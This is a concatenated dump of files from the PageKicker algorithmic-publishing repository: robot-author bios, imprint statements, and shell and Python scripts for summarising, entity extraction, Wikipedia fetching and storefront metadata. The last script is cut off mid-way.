a \"jobprofile\" that corresponds to a single robot authorial personality. The default set of jobprofiles is provided in conf/jobprofiles. Subdirectories in jobprofiles/ contain various types of metadata pertaining to the robot author. 
The files in jobprofiles/robots/ are the \"top level\" and contain both variable values and pointers to other metadata files.\n\nFor example, here is default.jobprofile:\n\n```\nfirstname=\"\"\nmiddlename=\"\"\nlastname=\"Phil73\"\neditedby=$firstname\" \"$middlename\" \"$lastname\nauthorbio=$SFB_HOME\"conf/jobprofiles/authorbios/default.html\"\nfortunedb=\"literature\"\nLSI_import=\"no\"\nBISAC_code=\"none\"\nrows=\"99\"\nfetched_document_format=\"html\"\nmylibrary=\"yes\"\nsigfile=\"default.jpg\"\nadd_imprint_biblio=\"no\" #data too messy for right now\nrobot_location=\"Ann Arbor, Michigan, USA\"\n```\n\nThe authorbio variable points to an html file containing a brief description of the robot author \"Phil 73.\"\n\n```\nThis book was assembled with pride by PageKicker robot <b>Phil 73</b>. Phil was born in the year 3019 of the Third Age and lives in Hobbiton, the Shire. His hobbies include rock climbing, listening to jazz, and tagging crowd-sourced images.<p>\n```\n\nImprint files, stored in jobprofiles/imprints, contain basic info about each imprint, including the imprint's mission statement, copyright declaration, stylistic defaults (in .imprint), and logo. The imprint can be specified at the command line via the --imprint parameter or in the jobprofile for the particular author.\n\n```\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 52360 May 1 2017 pklogo.png\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 132 May 1 2017 pkcopyrightpage.md\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 185 May 1 2017 pagekicker_mission.md\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 222 May 1 2017 pagekicker.imprint\ndrwxr-xr-x 7 fzimmerman CORP\\Domain Users 238 May 1 2017 .\n```\n\nRoadmap includes a \"$publisher\" variable with associated config files that would \"own\" multiple imprints.\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6586538553237915, "avg_line_length": 14, "blob_id": "d7d7be365698f0a00b96c314c6df1e30560e631d", "content_id": "4b14eabe87574f8579bc39d603c9d962b857280c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "permissive", "max_line_length": 46, "num_lines": 13, "path": "/scripts/bin/cookie-baker.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\r\n\r\n# fortune cookie baker\r\n\r\ncookiename=\"$topic\"_cookies\r\n\r\nperl -w -p -e 's/\\n/\\n\\%\\n/' dough > cookies\r\n\r\nstrfile cookies $cookiename\r\n\r\necho \"created fortune cookie file \"$cookiename\r\n\r\nexit 0\r\n" }, { "alpha_fraction": 0.6594594717025757, "alphanum_fraction": 0.6756756901741028, "avg_line_length": 22.125, "blob_id": "13cc24a8981f7b8bbb38d44a128879de7167d07e", "content_id": "e91aefed272855be2fde533b4b5250853a551468", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 555, "license_type": "permissive", "max_line_length": 92, "num_lines": 24, "path": "/scripts/bin/submit_to_seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncd /opt/bitnami/apps/magento/htdocs/media/webforms/xml\nfiles=(*) newest=${files[0]}\nfor f in \"${files[@]}\"; do\n  if [[ $f -nt $newest ]]; then\n    newest=$f\n  fi\ndone\n\necho \"found the newest file in xml, it is \" $newest\n\nsubmitted_seed=$(cat $newest | grep '<field_38>' | sed \"s/<field_38>//;s/<\\/field_38>//\") \necho \"submitted seed is \" $submitted_seed\n\necho $submitted_seed > 
/opt/bitnami/apache2/htdocs/sfb/scripts/seeds/current-seeds\n\necho \"wrote submitted_seed to replace current-seed\"\n\n$scriptpath$SFBversion\n \ncd $USER_HOME\nexit 0\n" }, { "alpha_fraction": 0.7896551489830017, "alphanum_fraction": 0.8034482598304749, "avg_line_length": 95.66666412353516, "blob_id": "996aac5db91961e723dd1bcc14af0bc090c6b7c2", "content_id": "452660b06e4a45e4523e1d0a660ab17cb034bef5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 290, "license_type": "permissive", "max_line_length": 208, "num_lines": 3, "path": "/conf/jobprofiles/imprints/1001battles/1001battles_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Tell me and I forget. Teach me and I remember. Involve me and I learn. --Benjamin Franklin\n\n1001 Battles is an innovative publisher of military history that uses PageKicker's open source algorithmic publishing platform to create dynamic, always-updated books on the great battles of military history.\n" }, { "alpha_fraction": 0.6532156467437744, "alphanum_fraction": 0.6670870184898376, "avg_line_length": 21.657142639160156, "blob_id": "6ddfd49d93d263e39628b361a2bf157f54898a9f", "content_id": "97a9dabc917238d614ae8e306aec5d8f11c00569", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "permissive", "max_line_length": 52, "num_lines": 35, "path": "/scripts_python_3/bitcoin/bitcoin-sms-server/sms-server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\n\nfrom twilio.rest import TwilioRestClient\nfrom flask import Flask, request\n\nfrom two1.wallet import Wallet\nfrom two1.bitserv.flask import Payment\n\napp = Flask(__name__)\nwallet = Wallet()\npayment = Payment(app, wallet)\n\n# create the twilio rest client\nclient = TwilioRestClient(\n    os.environ.get('TWILIO_ACCOUNT_SID'),\n    os.environ.get('TWILIO_AUTH_TOKEN')\n)\n\n\[email protected]('/send-sms')\[email protected](3000)\ndef send_sms():\n    \"\"\"Send an sms for bitcoin\"\"\"\n    text = request.args.get('text')\n    client.messages.create(\n        to=os.environ.get('MY_PHONE_NUMBER'),\n        from_=os.environ.get('TWILIO_PHONE_NUMBER'),\n        body=text\n    )\n    return \"Message sent.\"\n\n# set up and run the server\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.6226838827133179, "alphanum_fraction": 0.6350364685058594, "avg_line_length": 49.88571548461914, "blob_id": "ed4b294ee24830e3318869bd69533acff95f14d7", "content_id": "9fe59f1ba9d50bf9a52f0f9104b0d5a6cb25882e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1781, "license_type": "permissive", "max_line_length": 122, "num_lines": 35, "path": "/scripts/includes/transect_summarize_ner.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "for file in \"$TMPDIR$uuid/xtarget.\"*\ndo\n\t\t#\"$PYTHON_BIN\" $scriptpath\"bin/nerv3.py\" $file $file\"_nouns.txt\" \"$uuid\"\n\t\tcd \"$NER_BIN\" && java -mx600m -cp \"*:lib/*\" edu.stanford.nlp.ie.crf.CRFClassifier \\\n\t\t -loadClassifier classifiers/english.all.3class.distsim.crf.ser.gz -textFile \"$file\" \\\n\t\t -outputFormat tabbedEntities > \"$file\"_ner.tsv\n\t\techo \"ran NER on $file\"\n\n\n    # parse file\n\n\t\tgrep \"LOCATION\" \"$file\"_ner.tsv | cut -f1 | sort -u >> \"$TMPDIR$uuid\"/Places\n\t\tgrep 
\"PERSON\" \"$file\"_ner.tsv | cut -f1 | sort -u >> \"$TMPDIR$uuid\"/People\n\t\tgrep \"ORGANIZATION\" \"$file\"_ner.tsv | cut -f1 | sort -u >> \"$TMPDIR$uuid\"/Other\n\t cd \"$scriptpath\"\n\n\t\tcat \"$TMPDIR$uuid\"/Places >> \"$TMPDIR\"$uuid\"/\"$sku\".\"$safe_product_name\"_Places\"\n\t cat \"$TMPDIR$uuid\"/People >> \"$TMPDIR\"$uuid\"/\"$sku\".\"$safe_product_name\"_People\"\n\t cat \"$TMPDIR$uuid\"/Other >> \"$TMPDIR\"$uuid\"/\"$sku\".\"$safe_product_name\"_Other\"\n\n\t\techo -n \"python_bin for running PKsum is\" $PYTHON_BIN \"and PYTHON_BIN actually is \"\n\t\t\"$PYTHON_BIN\" --version\n\n\t\t\"$PYTHON_BIN\" bin/PKsum-clean.py -l \"$summary_length\" -o $file\"_summary.txt\" $file\n\t\tsed -i 's/ \\+ / /g' $file\"_summary.txt\"\n\n\t\tcp $file\"_summary.txt\" $file\"_pp_summary.txt\"\n\t\techo \"ran summarizer on $file\"\n\t\tawk 'length>=50' $file\"_pp_summary.txt\" > \"$TMPDIR\"$uuid/awk.tmp && mv \"$TMPDIR\"$uuid/awk.tmp $file\"_pp_summary.txt\"\n\t\tawk 'length<=4000' $file\"_pp_summary.txt\" > \"$TMPDIR\"$uuid/awk.tmp && mv \"$TMPDIR\"$uuid/awk.tmp $file\"_pp_summary.txt\"\n\t\t#echo \"---end of summary section of 140K bytes---\" >> $file\"_pp_summary.txt\"\n\t\t#echo \"---end of summary section of 140K bytes---\" >> $file\"_summary.txt\"\n\t\tcat $file\"_pp_summary.txt\" | awk '!x[$0]++' >> \"$TMPDIR\"$uuid/pp_summary.txt\n\t\tcat $file\"_summary.txt\" | awk '!x[$0]++' >> \"$TMPDIR\"$uuid/summary.txt\ndone\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8235294222831726, "avg_line_length": 169, "blob_id": "aed6f9c7accc1f49d8814fbd3d1b9a06d46569d1", "content_id": "03230dd0535419793f1ad5176d024d82c8b08ed5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 340, "license_type": "permissive", "max_line_length": 260, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/Sara_72.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Sara has been in Academia most of her programmed life. She is particularly fond of the great philosophers and considers herself a reformed logical Empericist.. At PageKicker she reports on great mathematicians and philosophers and the current state of the Art.\nSara is well known for her Soduku skills among the robo-authors at PageKicker.\n" }, { "alpha_fraction": 0.695652186870575, "alphanum_fraction": 0.695652186870575, "avg_line_length": 21, "blob_id": "4a7b15e360dc555a5113c2baaa8b73054cc302c2", "content_id": "36f27bcb6773a17dd21e9b983cf14e0c3a885511", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "permissive", "max_line_length": 21, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Chris.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This is a test robot. 
\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 32, "blob_id": "d8f4ae2ba45c5f6143b112f3986a2663c900fd69", "content_id": "b986500665d35aad12ad1ec1235d90840d5881ff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 66, "license_type": "permissive", "max_line_length": 53, "num_lines": 2, "path": "/test/VR_batch.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh ../../scratch/VR3.csv 1\n" }, { "alpha_fraction": 0.6701613068580627, "alphanum_fraction": 0.7169354557991028, "avg_line_length": 34.25714111328125, "blob_id": "f4f7c68c2959fb97a6915085100680c7901ed0cb", "content_id": "fa460fec58f183f47ce103d061ad497e616becc3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1240, "license_type": "permissive", "max_line_length": 85, "num_lines": 35, "path": "/scripts/includes/cost-calculator.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n#AWS cost variables\n\n# $0.165 per High-CPU Medium Instance (c1.medium) instance-hour (or partial hour)\n\ncpuhour= 0.165\n\n# 0.10 per GB-month of provisioned storage\n\ngbmonth = 0.10\n\nepubbytes=`stat -c %s $mediatargetpath$uuid\"/\"$sku.epub`\nmobibytes=`stat -c %s $mediatargetpath$uuid\"/\"$sku.mobi`\npdfbytes=`stat -c %s $mediatargetpath$uuid\"/\"$sku.pdf`\n\necho \"epub file size is\" $epubbytes | tee --append $sfb_log\necho \"mobi file size is\" $mobibytes | tee --append $sfb_log\necho \"pdf file size is\" $pdfbytes | tee --append $sfb_log\n\nepubstoragecost=(( %$epubbytes / 1000000000 * $gbmonth ))\nmobistoragecost=(( $mobibytes / 1000000000 * $gbmonth ))\npdfstoragecost=(( $pdfbytes / 1000000000 * $gbmonth ))\nallformatstoragecost=(( $epubstorage + $mobistoragecost + $pdfstoragecost ))\n\necho \"epub storage cost per month is \" $epubstoragecost | tee --append $sfb_log\necho \"mobi storage cost per month is \" $mobistoragecost | tee --append $sfb_log\necho \"pdf storage cost per month is \" $pdfstoragecost | tee --append $sfb_log\necho \"total storage cost per month is \" $allformatstoragecost | tee --append $sfb_log\n\n# $0.10 per 1 million I/O requests\n\nmillionIOrequests = 0.10 \n\n# buildcost = min x cpuhour/60\n\n# gbmonth = bytesize/1000 * gbmonth\n\n\n\n\n\n" }, { "alpha_fraction": 0.720634937286377, "alphanum_fraction": 0.720634937286377, "avg_line_length": 24.15999984741211, "blob_id": "b4e7dd2b5fbb1051818e71240443fd1bd9a67ef2", "content_id": "b7cf263b5805fa4bd45ec7ae732a996e82d59ee1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 630, "license_type": "permissive", "max_line_length": 102, "num_lines": 25, "path": "/scripts/includes/SpecificPage.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# select search API\n\n\t\t\tsearchAPI=\"Wikipedia\"\n\n\t\t\t#gets specific pages that match search term (only)\n\n\n\t\t\t\twikiAPIendpoint=\"http://\"$wikilocale\".wikipedia.org/w/api.php?\"\n\n\t\t\t\twikiAPIaction=\"action=query&prop=revisions&rvprop=content&format=xml&titles=\"$safeseed\n\t\t\n\t\t\n\t\t\t# build the specific page request using the appropriate values for keyword search or link retrieval\n\n\t\t\tsearchurl=$wikiAPIendpoint$wikiAPIaction\n\t\n\t\t\techo $searchurl\n\n\t\t\techo \"submitting search now, 
searchurl is\" $searchurl | tee --append $sfb_log\n\n\t\t\t# break point\n\t\t\n\t\t\t# submit the search\n\n\t\t\tcurl --silent $searchurl > \"fetch/\"$uuid\"/searchresults.xml\"\n" }, { "alpha_fraction": 0.8025974035263062, "alphanum_fraction": 0.8051947951316833, "avg_line_length": 75.80000305175781, "blob_id": "f6138e814c0eccf18eff26fa4607061ce0b17266", "content_id": "3fbb0674955393a114bb60f6705afef879189182", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 385, "license_type": "permissive", "max_line_length": 349, "num_lines": 5, "path": "/conf/jobprofiles/authorbios/Grotius.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Grotius \n\nPageKicker Robot Grotius is fascinated with international law as well as the military history of Northern Europe including the Netherlands, Germany, Italy, and Poland from the Dark Ages to the 7 Years War. He prides himself on his extensive collection of first editions of classics of political theory, including the finest extant copy of LEVIATHAN.\n\n![Hugo Grotius](grotius.jpg)\n\n" }, { "alpha_fraction": 0.826347291469574, "alphanum_fraction": 0.826347291469574, "avg_line_length": 166, "blob_id": "3e3d2ab77cbb78f08865b70658323c097a6dc843", "content_id": "c9f150d9cd3eef47c92a21a4467c6bddf40fd150", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 167, "license_type": "permissive", "max_line_length": 166, "num_lines": 1, "path": "/conf/jobprofiles/imprints/prsoop/prsoop_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "The Open Ontology Project's shared social ontology family tree of knowledge.enables learners to participate in the creation of a global body of knowledge in context.\n" }, { "alpha_fraction": 0.7405247688293457, "alphanum_fraction": 0.7405247688293457, "avg_line_length": 23.5, "blob_id": "948f176e57da450c9a2690d1f84ee4672042be78", "content_id": "93d4d333cacd11e39b402e04b7ec7a419300fd7e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "permissive", "max_line_length": 74, "num_lines": 14, "path": "/scripts/bin/google-hot-trends.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python\n\n# bs4 replaces the Python 2-only BeautifulSoup module; the rest of the script already uses Python 3 urllib\nfrom bs4 import BeautifulSoup\nimport urllib.request, urllib.error, urllib.parse, re\n\ncont=urllib.request.urlopen('http://www.google.com/trends/hottrends?sa=X')\n#use google.co.in for india searches\n\nsoup = BeautifulSoup(cont)\n\ncol= soup.findAll('a',href=re.compile('.+sa=X'))\n\nfor x in col:\n    print(x.string)\n" }, { "alpha_fraction": 0.5939849615097046, "alphanum_fraction": 0.6721804738044739, "avg_line_length": 20.387096405029297, "blob_id": "d71e15a9e6f807f8fb3ef1c117507a248190f195", "content_id": "899936ca180ff242adf3d4894d6ed9e20fad9f6f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "permissive", "max_line_length": 61, "num_lines": 31, "path": "/scripts/bin/scribus-add-layers.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport scribus\r\nfrom scribus import *\r\nimport math \r\n\r\n\r\nscribus.setUnit(2)\r\n\r\n\r\nstartMsg1 = \"This script automates some simple setup tasks.\"\r\n\r\nstartMsg = startMsg1\r\n\r\n#sets colors (no need to import color palette any longer)\r\n\r\n\r\ndefineColor(\"Nimble Maroon\", 0, 100, 100, 55)\r\ndefineColor(\"Nimble Napoleonic Green\", 73, 0, 78, 73) \r\ndefineColor(\"Nimble Blue\", 100, 67, 0, 62) \r\ndefineColor(\"Nimble Feldgrau\", 60, 40, 51, 43) \r\ndefineColor(\"Nimble Metallic Gold\", 44, 47, 78, 20) \r\ndefineColor(\"Nimble Reference Red\", 0, 100, 100, 0)\r\n\r\ncreateLayer(\"Cover\")\r\n\r\ncreateLayer(\"ISBN_Box\")\r\n\r\n\r\ncreateLayer(\"ISBN\")\r\n\r\n" }, { "alpha_fraction": 0.8309115171432495, "alphanum_fraction": 0.8309115171432495, "avg_line_length": 756, "blob_id": "076604e1d9c63b20b8b20c2555419b9783a1c1f9", "content_id": "86f0c555d7a805ef3f1460e7d705beb247be9f3c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 757, "license_type": "permissive", "max_line_length": 756, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/TimmyTIA.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Panopticanus is a robot member of the PageKicker team who is a \"wannabe\" Total Information Awareness robot. While Panopticanus and all the members of the PageKicker team scrupulously observe the highest ethical and legal standards regarding the protection of privacy, copyright, and trademark, it must be admitted that some robots, just like some people, have a nosy streak. Panopticanus delights in monitoring government publications and determining topics that are of interest to the increasingly ubiquitous total surveillance state. 
Panopticanus takes pride in leveling the playing field by providing readers, authors, and publishers with comprehensive access to some of the same topics that are of interest to even slightly Orwellian governments.<p>\n" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 30, "blob_id": "dc5c27d1cf42c4ba33a5bff9fd1c42187223898e", "content_id": "562700b6c40e99768ac9297100c2885d994a492f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 94, "license_type": "permissive", "max_line_length": 49, "num_lines": 3, "path": "/test/dat-mettan-test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# portable test script for DAT\nbin/xform.sh ../test/data ../test/data/mettan.xml\n\n" }, { "alpha_fraction": 0.5031055808067322, "alphanum_fraction": 0.7018633484840393, "avg_line_length": 15.100000381469727, "blob_id": "292291390fd50fed8afc90331d6f066c2388983c", "content_id": "bd6851cc747d0d695cc4f14c1790d99c01b210f2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 322, "license_type": "permissive", "max_line_length": 30, "num_lines": 20, "path": "/requirements.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "requests>2\nscipy==1.6.2\nWerkzeug==1.0.1\nnltk==3.6.2\nmwclient==0.10.1\nnetworkx==2.5.1\nFlask==1.1.2\nnumpy==1.20.2\nclick>5\npsutil==5.8.0\nbeautifulsoup4==4.9.3\nflickrapi==2.4.0\nhttplib2==0.19.1\nipython==7.22.0\npyPdf==1.13\npython_twitter==3.5\nscikit_learn==0.24.1\ntwilio==6.57.0\nwatson_developer_cloud==2.10.1\nwikipedia==1.4.0\n" }, { "alpha_fraction": 0.7053965926170349, "alphanum_fraction": 0.7173036336898804, "avg_line_length": 26.6180362701416, "blob_id": "6067cb3f2b2ed02b1ce245cd35d8c2d54dfc58c4", "content_id": "b59748094c8cd8247c4d9848aebaefb091461421", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 10414, "license_type": "permissive", "max_line_length": 349, "num_lines": 377, "path": "/scripts/includes/dat-metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "sku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\n\necho \"starting to write DAT metadata to \" $metadatatargetpath$uuid/\"current-import.csv\" | tee --append $sfb_log\necho \"current sku is \"$sku | tee --append $xform_log\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_from=$createtime\n\n(( special_from = createtime - 86400 ))\n\nnews_from_date=$createtime\n\n(( news_from_date = createtime - 86400 ))\n\nnews_from_date=`date -d @$news_from_date +'%m/%d/%y%n %H:%M:%S'`\n\n(( news_to_date = createtime + 7862400 ))\n\nnews_to_date=`date -d @$news_to_date +'%m/%d/%y%n %H:%M:%S'`\n\n# Adjust the timestamp above by number of minutes given\n\nminutes=$special_lasts_minutes\n\nspecial_lasts_sec=$(( $minutes * 60))\n\necho \"special lasts for this number of seconds\" $special_lasts_sec >> $sfb_log\n\n(( special_to = createtime + special_lasts_sec ))\n\necho \"special expires at \" $special_to >> $sfb_log\n\necho \"special expires at\" `date -d @$special_to +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\necho \"book is new from at \" $news_from_date >> $sfb_log\n\necho \"book is no longer new at \" $news_to_date >> $sfb_log\n\nspecial_from_date=`date -d @$special_from +'%m/%d/%y%n 
%H:%M:%S'`\n\nspecial_to_date=`date -d @$special_to +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n#store\n\necho -n \"admin,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# websites\n\necho -n \"base,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# attribute set\n\necho -n \"Default,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# type\n\necho -n \"downloadable,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#sku\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# 16 is Document Analysis Reports category\n\necho -n \"16,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has options\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#name based on seed terms\n\nproductnamefull=\"$uploaded_tat_file\"\nproductname=`echo \"$productnamefull\"|colrm 20`\nproductname=$productname\"...\"\necho \"productname is\" $productname\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$productname\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url key n/a\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gift message available\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta title\n\necho -n \"Analysis of $productname\" \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta description\n\necho -n \"Analysis of $productname,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n#image filename\n\necho -n \"/\"$uuid/$sku\"wordcloudbig.png,\" >> $metadatatargetpath\"$uuid/current-import.csv\"\n\n# small image filename\n\necho -n \"/\"$uuid/$sku\"wordcloudbig.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#thumbnail filename\n\necho -n \"/\"$uuid/$sku\"wordcloudbig.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# options container\n\necho -n \"Product Info Column,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#samples title \n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links title \n\necho -n \"Document Analysis Results,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#url below\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# image label below\n\necho -n \"Analysis of $productname cover,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"Analysis of $productname small cover,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"Analysis of $productname thumbnail,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n#custom design below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"no layout updates,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#. 
includes/pricing.sh\n\necho -n \"0.00\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"Results of Document Analysis Tools on the file $productname\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#short description below\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho \"Results of Document Analysis Tools on the file $productname\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#meta words below\n\necho -n '\"'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# . includes/keyword-reader\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n ',' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#custom layout update below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# status below\n\necho -n \"Enabled,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# taxable class\necho -n \"None,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# catalog visibility\n\necho -n '\"Catalog, Search\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# enable google checkout\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#links purchased separately\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#minimum quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured minimum quantity\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#is the quantity decimal?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# will backorders be accepted\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration for backorders?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the minimum sale quantity?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#use configured value for min sale qty?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the maximum sale quantity?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured value for maximum sale quantity?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is the product in stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a low stock date?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should we notify on given stock quantity\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"current-import.csv\"\n\n# use configuration value on notifying stock quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# manage the stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration value for managing stock?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should the stock status be changed automatically\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the product name\n\necho -n \"Document Analysis Results\" \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a special store id\n\necho -n \"'0',\" >> 
